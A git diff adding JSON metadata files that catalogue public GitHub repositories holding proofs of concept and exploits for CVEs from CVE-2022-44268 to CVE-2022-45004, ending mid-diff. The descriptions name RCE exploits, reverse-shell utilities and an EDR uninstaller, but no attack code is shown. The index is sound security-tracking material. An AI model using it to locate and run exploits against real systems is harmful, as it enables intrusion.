"updated_at": "2023-12-07T00:07:54Z", + "pushed_at": "2023-07-24T04:25:28Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-44268", + "hackthebox", + "htb", + "imagemagick", + "imageupload", + "lfi" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 677919510, + "name": "CVE-2022-44268_By_Kyokito", + "full_name": "chairat095\/CVE-2022-44268_By_Kyokito", + "owner": { + "login": "chairat095", + "id": 44226708, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44226708?v=4", + "html_url": "https:\/\/github.com\/chairat095", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chairat095\/CVE-2022-44268_By_Kyokito", + "description": "CVE-2022-44268_By_Kyokito", + "fork": false, + "created_at": "2023-08-13T04:43:12Z", + "updated_at": "2023-08-14T01:11:30Z", + "pushed_at": "2023-08-13T04:44:30Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 687632513, + "name": "Exploit-for-ImageMagick-CVE-2022-44268", + "full_name": "atici\/Exploit-for-ImageMagick-CVE-2022-44268", + "owner": { + "login": "atici", + "id": 68865673, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68865673?v=4", + "html_url": "https:\/\/github.com\/atici", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/atici\/Exploit-for-ImageMagick-CVE-2022-44268", + "description": "A bash script for easyly exploiting ImageMagick Arbitrary File Read Vulnerability CVE-2022-44268", + "fork": false, + "created_at": "2023-09-05T17:16:06Z", + "updated_at": "2023-09-05T19:52:12Z", + "pushed_at": "2023-09-05T18:57:34Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 704595452, + "name": "IMAGE-MAGICK-CVE-2022-44268", + "full_name": "Vagebondcur\/IMAGE-MAGICK-CVE-2022-44268", + "owner": { + "login": "Vagebondcur", + "id": 103751916, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103751916?v=4", + "html_url": "https:\/\/github.com\/Vagebondcur", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vagebondcur\/IMAGE-MAGICK-CVE-2022-44268", + "description": null, + "fork": false, + "created_at": "2023-10-13T15:43:49Z", + "updated_at": "2023-10-13T15:49:04Z", + "pushed_at": "2023-10-13T15:49:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 718826402, + "name": "-CVE-2022-44268", + "full_name": "NataliSemi\/-CVE-2022-44268", + "owner": { + "login": "NataliSemi", + "id": 43733113, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43733113?v=4", + "html_url": "https:\/\/github.com\/NataliSemi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NataliSemi\/-CVE-2022-44268", + "description": null, + "fork": false, + "created_at": "2023-11-14T21:54:17Z", + "updated_at": "2023-11-14T22:02:19Z", + "pushed_at": "2023-11-16T23:00:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 727130787, + "name": "CVE-2022-44268-fixed-PoC", + "full_name": "CygnusX-26\/CVE-2022-44268-fixed-PoC", + "owner": { + "login": "CygnusX-26", + "id": 42686923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42686923?v=4", + "html_url": "https:\/\/github.com\/CygnusX-26", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CygnusX-26\/CVE-2022-44268-fixed-PoC", + "description": null, + "fork": false, + "created_at": "2023-12-04T08:48:28Z", + "updated_at": "2023-12-04T08:48:34Z", + "pushed_at": "2023-12-04T08:48:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 848769776, + "name": "CVE-2022-44268-automated", + "full_name": "PanAdamski\/CVE-2022-44268-automated", + "owner": { + "login": "PanAdamski", + "id": 108422861, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108422861?v=4", + "html_url": "https:\/\/github.com\/PanAdamski", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PanAdamski\/CVE-2022-44268-automated", + "description": null, + "fork": false, + "created_at": "2024-08-28T11:28:34Z", + "updated_at": "2024-08-29T02:03:02Z", + "pushed_at": "2024-08-28T11:37:11Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 851015122, + "name": "CVE-2022-44268", + "full_name": "FlojBoj\/CVE-2022-44268", + "owner": { + "login": "FlojBoj", + "id": 170850781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/170850781?v=4", + "html_url": "https:\/\/github.com\/FlojBoj", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FlojBoj\/CVE-2022-44268", + "description": "ImageMagick 7.1.0-49 vulnerable to Information Disclosure", + "fork": false, + "created_at": "2024-09-02T09:11:45Z", + "updated_at": "2024-09-02T09:56:19Z", + "pushed_at": "2024-09-02T09:56:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-44276.json b/2022/CVE-2022-44276.json new file mode 100644 index 0000000000..a543829d11 --- /dev/null +++ b/2022/CVE-2022-44276.json @@ -0,0 +1,33 @@ +[ + { + "id": 658104709, + "name": "CVE-2022-44276-PoC", + "full_name": "HerrLeStrate\/CVE-2022-44276-PoC", + "owner": { + "login": "HerrLeStrate", + "id": 26091132, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26091132?v=4", + "html_url": "https:\/\/github.com\/HerrLeStrate", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HerrLeStrate\/CVE-2022-44276-PoC", + "description": "PoC for Responsive Filemanager < 9.12.0 bypass upload restrictions lead to RCE", + "fork": false, + "created_at": "2023-06-24T19:28:44Z", + "updated_at": "2023-06-24T19:28:44Z", + "pushed_at": "2023-06-25T09:19:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-44311.json b/2022/CVE-2022-44311.json new file mode 100644 index 0000000000..9763a5a4e1 --- /dev/null +++ b/2022/CVE-2022-44311.json @@ -0,0 +1,69 @@ +[ + { + "id": 595851923, + "name": "CVE-2022-44311", + "full_name": "Halcy0nic\/CVE-2022-44311", + "owner": { + "login": "Halcy0nic", + "id": 42481692, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42481692?v=4", + "html_url": "https:\/\/github.com\/Halcy0nic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Halcy0nic\/CVE-2022-44311", + "description": "Proof of concept for CVE-2022-44311", + "fork": false, + "created_at": "2023-01-31T23:53:39Z", + "updated_at": "2024-07-02T20:34:18Z", + "pushed_at": "2023-02-01T00:32:46Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 603938610, + "name": "CVE-2022-44311", + "full_name": "DesmondSanctity\/CVE-2022-44311", + "owner": { + "login": "DesmondSanctity", + "id": 51109125, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51109125?v=4", + "html_url": "https:\/\/github.com\/DesmondSanctity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DesmondSanctity\/CVE-2022-44311", + "description": "Out-Of-Bounds Read in html2xhtml : CVE-2022-44311", + "fork": false, + "created_at": "2023-02-20T01:28:04Z", + "updated_at": "2023-03-17T15:48:31Z", + "pushed_at": "2023-02-21T01:55:23Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "advisory", + "security", + "vulnerabilities", + "vulnerability-assessment" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-44312.json b/2022/CVE-2022-44312.json new file mode 100644 index 0000000000..1a9278d3a1 --- /dev/null +++ b/2022/CVE-2022-44312.json @@ -0,0 +1,33 @@ +[ + { + "id": 657382893, + "name": "CVEs-for-picoc-3.2.2", + "full_name": "Halcy0nic\/CVEs-for-picoc-3.2.2", + "owner": { + "login": "Halcy0nic", + "id": 42481692, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42481692?v=4", + "html_url": "https:\/\/github.com\/Halcy0nic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Halcy0nic\/CVEs-for-picoc-3.2.2", + "description": "Reproduction files for CVE-2022-44312 through CVE-2022-44321", + "fork": false, + "created_at": "2023-06-23T00:16:52Z", + "updated_at": "2024-07-02T20:33:00Z", + "pushed_at": "2023-08-14T01:35:37Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-44318.json b/2022/CVE-2022-44318.json new file mode 100644 index 0000000000..e843f5b469 --- /dev/null +++ b/2022/CVE-2022-44318.json @@ -0,0 +1,33 @@ +[ + { + "id": 595867993, + "name": "CVE-2022-44318", + "full_name": "Halcy0nic\/CVE-2022-44318", + "owner": { + "login": "Halcy0nic", + "id": 42481692, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42481692?v=4", + "html_url": "https:\/\/github.com\/Halcy0nic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Halcy0nic\/CVE-2022-44318", + "description": "Proof of concept for CVE-2022-44318", + "fork": false, + "created_at": "2023-02-01T01:00:33Z", + "updated_at": "2024-07-02T20:33:56Z", + "pushed_at": "2023-02-01T01:13:26Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-44569.json b/2022/CVE-2022-44569.json new file mode 100644 index 0000000000..285cfa3788 --- /dev/null +++ b/2022/CVE-2022-44569.json @@ -0,0 +1,33 @@ +[ + { + "id": 797754300, + "name": "ivanti-automationmanager-exploit", + "full_name": "rweijnen\/ivanti-automationmanager-exploit", + "owner": { + "login": "rweijnen", + "id": 7575747, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7575747?v=4", + "html_url": "https:\/\/github.com\/rweijnen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rweijnen\/ivanti-automationmanager-exploit", + "description": "Exploit for Ivanti Automation Manager CVE-2022-44569", + "fork": false, + "created_at": "2024-05-08T13:00:16Z", + "updated_at": "2024-05-08T20:41:45Z", + "pushed_at": "2024-05-08T13:26:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-44666.json b/2022/CVE-2022-44666.json new file mode 100644 index 0000000000..f63f057241 --- /dev/null +++ b/2022/CVE-2022-44666.json @@ -0,0 +1,33 @@ +[ + { + "id": 602207436, + "name": "CVE-2022-44666", + "full_name": "j00sean\/CVE-2022-44666", + "owner": { + "login": "j00sean", + "id": 22483317, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22483317?v=4", + "html_url": "https:\/\/github.com\/j00sean", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/j00sean\/CVE-2022-44666", + "description": "Write-up for another forgotten Windows vulnerability (0day): Microsoft Windows Contacts (VCF\/Contact\/LDAP) syslink control href attribute escape, which was not fully fixed as CVE-2022-44666 in the patches released on December, 2022.", + "fork": false, + "created_at": "2023-02-15T18:12:04Z", + "updated_at": "2024-10-21T10:38:39Z", + "pushed_at": "2023-06-18T21:10:39Z", + "stargazers_count": 151, + "watchers_count": 151, + "has_discussions": false, + "forks_count": 26, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 26, + "watchers": 151, + "score": 0, + "subscribers_count": 6 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-44721.json b/2022/CVE-2022-44721.json new file mode 100644 index 0000000000..f076fb525b --- /dev/null +++ b/2022/CVE-2022-44721.json @@ -0,0 +1,33 @@ +[ + { + "id": 573763384, + "name": "CVE-2022-44721-CsFalconUninstaller", + "full_name": "gmh5225\/CVE-2022-44721-CsFalconUninstaller", + "owner": { + "login": "gmh5225", + "id": 13917777, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13917777?v=4", + "html_url": "https:\/\/github.com\/gmh5225", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gmh5225\/CVE-2022-44721-CsFalconUninstaller", + "description": null, + "fork": false, + "created_at": "2022-12-03T11:04:17Z", + "updated_at": "2024-11-07T05:28:12Z", + "pushed_at": "2022-12-02T14:38:27Z", + "stargazers_count": 23, + "watchers_count": 23, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 23, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-44789.json b/2022/CVE-2022-44789.json new file mode 100644 index 0000000000..e48a3087e8 --- /dev/null +++ b/2022/CVE-2022-44789.json @@ -0,0 +1,33 @@ +[ + { + "id": 569477631, + "name": "CVE-2022-44789", + "full_name": "alalng\/CVE-2022-44789", + "owner": { + "login": "alalng", + "id": 61508435, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61508435?v=4", + "html_url": "https:\/\/github.com\/alalng", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alalng\/CVE-2022-44789", + "description": null, + "fork": false, + "created_at": "2022-11-22T23:11:08Z", + "updated_at": "2023-12-11T06:17:46Z", + "pushed_at": "2023-01-28T10:31:02Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-44830.json b/2022/CVE-2022-44830.json new file mode 100644 index 0000000000..ff2aa28ccc --- /dev/null +++ b/2022/CVE-2022-44830.json @@ -0,0 +1,33 @@ +[ + { + "id": 568387723, + "name": "CVE-2022-44830", + "full_name": "RashidKhanPathan\/CVE-2022-44830", + "owner": { + "login": "RashidKhanPathan", + "id": 65374016, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65374016?v=4", + "html_url": "https:\/\/github.com\/RashidKhanPathan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RashidKhanPathan\/CVE-2022-44830", + "description": null, + "fork": false, + "created_at": "2022-11-20T11:35:05Z", + "updated_at": "2022-11-20T11:35:05Z", + "pushed_at": "2022-11-20T11:35:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-44870.json b/2022/CVE-2022-44870.json new file mode 100644 index 0000000000..384bc96383 --- /dev/null +++ b/2022/CVE-2022-44870.json @@ -0,0 +1,33 @@ +[ + { + "id": 580610277, + "name": "CVE-2022-44870", + "full_name": "Cedric1314\/CVE-2022-44870", + "owner": { + "login": "Cedric1314", + "id": 42855430, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42855430?v=4", + "html_url": "https:\/\/github.com\/Cedric1314", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cedric1314\/CVE-2022-44870", + "description": "maccms admin+ xss attacks ", + "fork": false, + "created_at": "2022-12-21T01:40:11Z", + "updated_at": "2023-01-24T20:36:42Z", + "pushed_at": "2023-01-03T07:43:45Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-44875.json b/2022/CVE-2022-44875.json new file mode 100644 index 0000000000..cd57e6a348 --- /dev/null +++ b/2022/CVE-2022-44875.json @@ -0,0 +1,33 @@ +[ + { + "id": 668761323, + "name": "CVE-2022-44875-Test", + "full_name": "AesirSec\/CVE-2022-44875-Test", + "owner": { + "login": "AesirSec", + "id": 62112812, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62112812?v=4", + "html_url": "https:\/\/github.com\/AesirSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AesirSec\/CVE-2022-44875-Test", + "description": "Testing CVE-2022-44875", + "fork": false, + "created_at": "2023-07-20T14:30:58Z", + "updated_at": "2024-05-06T20:50:03Z", + "pushed_at": "2023-07-26T00:27:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-44877.json b/2022/CVE-2022-44877.json new file mode 100644 index 0000000000..d764b965db --- /dev/null +++ b/2022/CVE-2022-44877.json @@ -0,0 +1,286 @@ +[ + { + "id": 585639540, + "name": "CVE-2022-44877", + "full_name": "numanturle\/CVE-2022-44877", + "owner": { + "login": "numanturle", + "id": 7007951, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7007951?v=4", + "html_url": "https:\/\/github.com\/numanturle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/numanturle\/CVE-2022-44877", + "description": null, + "fork": false, + "created_at": "2023-01-05T17:29:10Z", + "updated_at": "2024-09-28T15:55:34Z", + "pushed_at": "2023-01-05T17:40:18Z", + "stargazers_count": 102, + "watchers_count": 102, + "has_discussions": false, + "forks_count": 23, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 23, + "watchers": 102, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 585996269, + "name": "CVE-2022-44877-RCE", + "full_name": "komomon\/CVE-2022-44877-RCE", + "owner": { + "login": "komomon", + "id": 52700174, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52700174?v=4", + "html_url": "https:\/\/github.com\/komomon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/komomon\/CVE-2022-44877-RCE", + "description": "CVE-2022-44877 Centos Web Panel 7 Unauthenticated Remote Code Execution", + "fork": false, + "created_at": "2023-01-06T16:53:51Z", + "updated_at": "2023-12-21T10:22:09Z", + "pushed_at": "2023-01-06T17:00:09Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 596515870, + "name": "CVE-2022-44877-CWP7", + "full_name": "ColdFusionX\/CVE-2022-44877-CWP7", + "owner": { + "login": "ColdFusionX", + "id": 8522240, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8522240?v=4", + "html_url": "https:\/\/github.com\/ColdFusionX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ColdFusionX\/CVE-2022-44877-CWP7", + "description": "Control Web Panel 7 (CWP7) Remote Code Execution (RCE) (CVE-2022-44877) (Unauthenticated)", + "fork": false, + "created_at": "2023-02-02T11:00:32Z", + "updated_at": "2023-02-08T03:17:49Z", + "pushed_at": "2023-02-02T11:01:51Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 600549630, + "name": "CVE-2022-44877", + "full_name": "Chocapikk\/CVE-2022-44877", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2022-44877", + "description": "Bash Script for Checking Command Injection Vulnerability on CentOS Web Panel [CWP] (CVE-2022-44877)", + "fork": false, + "created_at": "2023-02-11T20:45:08Z", + "updated_at": "2024-08-12T20:29:46Z", + "pushed_at": "2023-02-11T22:03:19Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 602139288, + "name": "CVE-2022-44877-white-box", + "full_name": "hotpotcookie\/CVE-2022-44877-white-box", + "owner": { + "login": "hotpotcookie", + "id": 68333318, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68333318?v=4", + "html_url": "https:\/\/github.com\/hotpotcookie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hotpotcookie\/CVE-2022-44877-white-box", + "description": "Red Team utilities for setting up CWP CentOS 7 payload & reverse shell (Red Team 9 - CW2023)", + "fork": false, + "created_at": "2023-02-15T15:22:48Z", + "updated_at": "2024-04-28T06:08:43Z", + "pushed_at": "2023-09-06T11:54:19Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-44877", + "cwp", + "os-command-injection", + "pentesting" + ], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 609469987, + "name": "CVE-2022-44877-LAB", + "full_name": "RicYaben\/CVE-2022-44877-LAB", + "owner": { + "login": "RicYaben", + "id": 32867697, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32867697?v=4", + "html_url": "https:\/\/github.com\/RicYaben", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RicYaben\/CVE-2022-44877-LAB", + "description": null, + "fork": false, + "created_at": "2023-03-04T09:15:46Z", + "updated_at": "2023-03-11T20:49:36Z", + "pushed_at": "2023-03-13T08:32:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 619926011, + "name": "CVE-2022-44877", + "full_name": "dkstar11q\/CVE-2022-44877", + "owner": { + "login": "dkstar11q", + "id": 123830677, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123830677?v=4", + "html_url": "https:\/\/github.com\/dkstar11q", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dkstar11q\/CVE-2022-44877", + "description": "Bash Script for Checking Command Injection Vulnerability on CentOS Web Panel [CWP] (CVE-2022-44877)", + "fork": false, + "created_at": "2023-03-27T17:27:19Z", + "updated_at": "2023-02-13T09:30:39Z", + "pushed_at": "2023-02-11T22:03:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 720567207, + "name": "CVE-2022-44877-RCE", + "full_name": "rhymsc\/CVE-2022-44877-RCE", + "owner": { + "login": "rhymsc", + "id": 104529423, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104529423?v=4", + "html_url": "https:\/\/github.com\/rhymsc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rhymsc\/CVE-2022-44877-RCE", + "description": null, + "fork": false, + "created_at": "2023-11-18T21:53:54Z", + "updated_at": "2023-11-18T21:56:49Z", + "pushed_at": "2023-11-18T21:56:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 764149155, + "name": "CVE-2022-44877", + "full_name": "G01d3nW01f\/CVE-2022-44877", + "owner": { + "login": "G01d3nW01f", + "id": 75846902, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75846902?v=4", + "html_url": "https:\/\/github.com\/G01d3nW01f", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/G01d3nW01f\/CVE-2022-44877", + "description": null, + "fork": false, + "created_at": "2024-02-27T15:09:50Z", + "updated_at": "2024-02-27T15:10:39Z", + "pushed_at": "2024-02-28T00:57:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-44900.json b/2022/CVE-2022-44900.json new file mode 100644 index 0000000000..62ef4631f3 --- /dev/null +++ b/2022/CVE-2022-44900.json @@ -0,0 +1,33 @@ +[ + { + "id": 591689085, + "name": "CVE-2022-44900-demo-lab", + "full_name": "0xless\/CVE-2022-44900-demo-lab", + "owner": { + "login": "0xless", + "id": 78535423, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78535423?v=4", + "html_url": "https:\/\/github.com\/0xless", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xless\/CVE-2022-44900-demo-lab", + "description": "Demo webapp vulnerable to CVE-2022-44900", + "fork": false, + "created_at": "2023-01-21T14:52:59Z", + "updated_at": "2023-01-29T19:40:29Z", + "pushed_at": "2023-06-21T07:02:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45003.json b/2022/CVE-2022-45003.json new file mode 100644 index 0000000000..4bb9831d94 --- /dev/null +++ b/2022/CVE-2022-45003.json @@ -0,0 +1,33 @@ +[ + { + "id": 620455544, + "name": "CVE-2022-45003", + "full_name": "mha98\/CVE-2022-45003", + "owner": { + "login": "mha98", + "id": 129213216, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129213216?v=4", + "html_url": "https:\/\/github.com\/mha98", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mha98\/CVE-2022-45003", + "description": null, + "fork": false, + "created_at": "2023-03-28T18:04:17Z", + "updated_at": "2023-03-28T18:04:17Z", + "pushed_at": "2023-03-28T18:05:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45004.json b/2022/CVE-2022-45004.json new file mode 100644 index 0000000000..235362b410 --- /dev/null +++ 